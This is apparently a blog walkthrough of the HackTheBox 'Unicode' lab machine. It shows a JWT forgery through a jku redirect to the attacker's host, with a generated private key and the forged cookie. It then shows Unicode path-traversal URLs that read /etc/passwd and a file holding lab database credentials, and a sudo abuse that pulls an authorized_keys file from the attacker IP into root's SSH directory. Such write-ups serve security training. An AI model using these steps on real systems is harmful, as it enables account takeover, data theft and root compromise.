Hack_The_Box_Writeups

HackTheBox – Unicode Walkthrough – In English

saksham dixit

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -sV -T4 -Pn 10.10.11.126

http://10.10.11.126/

By searching a bit you can find a lot of forms, file sending, … But after having tested them I don’t find anything conclusive.

Click on Buy Now -> middle Checkout

JWT token

So it’s a JWT cookie with the RS256 algorithm.

We also learn that in the majority of the cases we use asymmetric keys and that in this case the site must host a jwks file with the keys properties. I can get the content of this file with the following command:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl hackmedia.htb/static/jwks.json

At the end of the article we learn one last thing, in general this element is stored in the header of the page. But in our case it is in the form of a cookie.

To change the account for the admin account, we will try to do a JWKS Spoofing. To do this we will first generate a key pair following the same parameters as the jwks.json file we found. For that I use the following site

https://mkjwk.org/

I then create a jwks.json file with the same structure as the previous one but with the n we just generated.

Then I start to modify our cookie. First I change the value of jku and add the following element:

/../redirect?url=10.10.14.4/jwks.json

Then I add in the Verify Signature part the Public/Private key that we have generated.

Finally I change the variable user with the value admin.

Header:

{

  “typ”: “JWT”,

  “alg”: “RS256”,

  “jku”: “http://hackmedia.htb/static/../redirect?url=10.10.14.102/jwks.json”

}

Payload:

{

  “user”: “admin”

}

Public and Private

Public:

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz+BE72Y6Az4btntZTzGu
DiyerjxoGZ3FDjDgh/hSkJ3uPsANvQLyvcX2saHg/IMWMXAg5y4irUOt0LNkjp56
8G5OTEWJMdUZHYUu0ohz17Ggcij8QZF7mE+O39kGpZfZLQI3xyV6rtHVHGGoxxFS
HKe8F31TpYkHa+KECp4W7g+tIKUpAnf4P0M3vhfbA6MPsNCzm1gvr4wg1VmRZDCC
kXaeZQ7Hzx0Gg14zu49/ZujL8h40J1oxLbkJ81GX9T0nx6I1C/zMeizUGn9F7vR/
wJGzKj03F+2JJBdDkWHbr6gYvmVkpbomRfayd4iRwpTk8PL79XSZCUFga+sdM+C4
BQIDAQAB

-----END PUBLIC KEY-----

Private:

-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDP4ETvZjoDPhu2
e1lPMa4OLJ6uPGgZncUOMOCH+FKQne4+wA29AvK9xfaxoeD8gxYxcCDnLiKtQ63Q
s2SOnnrwbk5MRYkx1RkdhS7SiHPXsaByKPxBkXuYT47f2Qall9ktAjfHJXqu0dUc
YajHEVIcp7wXfVOliQdr4oQKnhbuD60gpSkCd/g/Qze+F9sDow+w0LObWC+vjCDV
WZFkMIKRdp5lDsfPHQaDXjO7j39m6MvyHjQnWjEtuQnzUZf1PSfHojUL/Mx6LNQa
f0Xu9H/AkbMqPTcX7YkkF0ORYduvqBi+ZWSluiZF9rJ3iJHClOTw8vv1dJkJQWBr
6x0z4LgFAgMBAAECggEAZ7iDLOBY+d03fqm1OiqTqkbhNha16nIqLJZ+sdlZeQcU
JQM216Rs8fugx6j51YSiwjAseq0uaD1osMWR2weAWA7xymS3u8GUMoKNhkbHZkwe
vlds5lpszOaFZ3OmOWG23xpIMnmk6S2RpAOmbw1ZZyraUu4ZmnLw3Qe80n9m+Yi6
pPcI0CkQNoX488OJBzQfh/i9cRn7AutTAsDNz6gwAVxPwzxmlzuvh/FD1yOHi1ws
ujNep3kw5G9DOh/Xb+G++Z2F6C2qI1BcpABRxxtU89HCTJepiNAKy+BDy+/zIY3u
YUMaSioHo/KrIYsP29/QQHdKzH+roou+aNhmQEC+UQKBgQDpMciJWLTL8nxNbNkA
WOQbJsi597/lCs7/p8wxXSsf7OmbijpGWuZuS2+SyHCRPYEBYaoRs/9Hpx5rW42i
YRovM+ss3BOeKQVsuwD6Yv5rAq7ypxQ154BcRpb2seeBKjKNZdsRelUmuvdrlz2r
y4fjQtLyXZPXK7IvV4nMw/Z/QwKBgQDkNJ5TAqakZWegvrAFM91/S44+JE3S201x
/FOYM/FAn2GhkAxzhYs/qaFwYIJNllI27UU/1Uc+WGnFUZCHIgP6ZfW6czXKYhtp
F645c37dSh/UuTHJmfIUQJbRfYbTAnXToI2d0IQUciV1AF+OIoTBCzppEwU8+ofT
QVuXNDSDFwKBgC62Uj1xD4ZrJIs96povNEJcGolmH4J6D80Wh8i7qQ/UHVeS8Ol2
/AHMCqWUkTgG4fis36x8Kf7ocyd+R3jnip85/zoVO7jK7tNBAoklm2FEQFdLMLk7
jnLtkQAJ0x4EnevFI4T0xGnlufpLaYcoVigoEqmKJTtM/XyORIRIHPCRAoGAFQ9G
DSMRfdpd1dfDJrfCmRy/47w18l+KphpDHKiueug6ek5w17hbQWTGITjGzaIxtB/x
ZBKqoHZITI1aaR4af+Eo7Cv1qtei7+/fhC3EZ2ePyHHOxmwOiw/q2ypaZt6zQPRw
HUBA8CIYktOV/efxmF8Q5OF8ekQkhLpjWXDX58ECgYA1m1naSmnoG8bbQcUkaMdy
sb7ZioVXahwVhCWKJbvPZ7f+muG9fxnzSkQX6jBjk4ZIdg5lihXi3Yl6NXuLWh7C
+X0IdbbR6ERTHj0Y4+XEdmXwY0cQSuDi1gzsJteCeZ8cCZOA6DcocqyopKMZO+vg
ioY6ynXs0+g5mRVF3MQ9gA==

-----END PRIVATE KEY-----

Final Cookie:

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9oYWNrbWVkaWEuaHRiL3N0YXRpYy8uLi9yZWRpcmVjdD91cmw9MTAuMTAuMTQuMTAyL2p3a3MuanNvbiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.pm_EMYYW7GBm6iGe31_5tjMa_qB7zloEy46UaLaNKSiQ89SD7OH51ppk0k1QgUTOx3d2WiVnHhQkc3KZTH_Twye2NAjT-0kgULr3m9sjNe1AjbtgvEmebLRsxSEaAkjfsYSOGMW1hh5i7e1AO324hn0VRQYUM7ur_Cr4DBJk6b18VVjzs6Bo-zrtqdZD_0Bu_OaOyq9WToy8A0j1b0uS3nHJ30f1nC8ufrwe8JYErZeNJ5rTQpNcKxa0sSWa7xtmmrkUEU3DrPiFhSLiaI7OzEAKFCkxCQ9KoKkA0uvjhsIPTVbIT4b3cCpBHymwCdVhdaPIw02SCBxTIedyu5DE9g

Now that we have our new cookie, I replace the old value with the new one, then refresh the page. I now have access to the admin interface!

click on Current Report and intercept and change the jwt token value we get.

http://10.10.11.126/display/?page=monthly.pdf

http://10.10.11.126/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/passwd

http://10.10.11.126/display/?page=︰/︰/︰/︰/︰/︰/︰/home/code/coder/db.yaml

We get this

mysql_host: "localhost" 
mysql_user: "code" 
mysql_password: "B3stC0d3r2021@@!"

mysql_db: "user"

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh code@10.10.11.126

Password: B3stC0d3r2021@@!

code@code:~$ cat user.txt

code@code:~$ sudo –l

Enter the IP/file_name:-K/root/root.txt

Enter your choice:3

Enter the IP/file_name:{10.10.14.102/authorized_keys,-o,/root/.ssh/authorized_keys}

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh root@10.10.11.126 -i /root/.ssh/id_rsa

Hi, I’m saksham dixit

Related Posts

Hack The Box – Spectra

──(root💀kali)-[/home/kali/Downloads] └─# nmap -A 10.10.10.229 http://10.10.10.229:8081/ http://10.10.10.229/ http://spectra.htb/main/ http://spectra.htb/testing/index.php http://spectra.htb/testing/...
saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *